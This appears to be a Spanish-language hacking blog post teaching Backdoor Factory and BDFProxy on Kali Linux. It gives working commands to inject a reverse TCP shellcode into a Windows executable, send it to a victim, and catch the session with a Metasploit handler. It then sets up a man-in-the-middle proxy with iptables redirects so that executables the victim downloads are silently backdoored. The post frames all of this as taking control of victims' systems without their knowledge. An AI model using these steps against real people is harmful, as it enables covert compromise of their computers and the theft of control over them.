Advertisement

header ads

APRENDAMOS A USAR BACKDOOR FACTORY Y BDFProxy EN KALI LINUX 2016.1

Este post lo quería escribir hace tiempo pero ya termine todos los niveles actualizados de DVWA entonces ya estoy libre, aun recuerdan una herramienta que publique llama SHELLTER.




Bueno parecido a Backdoor Factory. Me imagino que la diferencia es que Shellter no esta en KALI LINUX.

Se preguntarán: 

¿Qué es BACKDOOR FACTORY?

El objetivo de Backdoor Factory es Inyectar shellcodes en ficheros exe “al vuelo” con The Backdoor Factory Proxy (BDFProxy) The Backdoor Factory (BDF) es una herramienta escrita en Python para “parchear” binarios ejecutables añadiendo shellcodes mediante Code Cave Injection.
Recuerda que vamos a ver de las dos formas Backdoor Factory y BFDProxy. Ambos cumplen su misma funcion pero BFDProxy hace una como MITM.

BACKDOOR FACTORY
Para saber sobre sus comandos podemos ir a las opciones de ayuda
backdoor-factory -h
backdoor -f /root/Desktop/redtube.exe -s show
Primeramente vamos a seleccionar la ubicación de nuestro .exe recuerda que solo funciona para sistemas o programas de 32bits, luego podemos ver que tipo de shell le queremos agregar en el código
backdoor -f /root/Desktop/redtube.exe -s iat_reverse_tcp_stager_threaded -H  -P
Como ven hemos seleccionado la shell y colocamos nuestra IP y un puerto necesario.
Puertos de ejemplo:
8080
4444
Ese archivo se generará en una carpeta nueva llamada “backdoored” y encontraremos nuestro .exe y le vamos a enviar eso a nuestra victima.
Recomiendo putty porque queda abierto y no tiene instalación.
Ahora vamos abrir nuestro meterpreter
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 8080
exploit
Me imagino que tendrás como se usa msfconsole sino puedes visitar mis post
Y ejecutamos el programa .exe y tenemos control al sistema.

BDFProxy

Configurar las IP
nano /etc/bdfproxy/bdfproxy.cfg
Colocamos nuestras IP sin cambiar nada más.
bdfproxy
Ejecutamos BDFProxy

Al ejecutar nos aparece esto “bdfproxy_msf_resource.rc” para poder ejecutar en nuestro meterpreter.
service postgresql start
msfconsole -r bdfproxy_msf_resource.rc
O
msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
Ahora vamos a configurar nuestro Firewall
sysctl -w net.ipv4.ip_forward=1
o
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
Ahora nuestra victima va a descargar un .exe y quedará totalmente infectado y tomarás control sin que se de cuenta.
Al ejecutar .exe veras la consola de meterpreter que tengas el control del sistema.
Espero haberte ayudado y no te olvides en compartirlo.

Publicar un comentario

0 Comentarios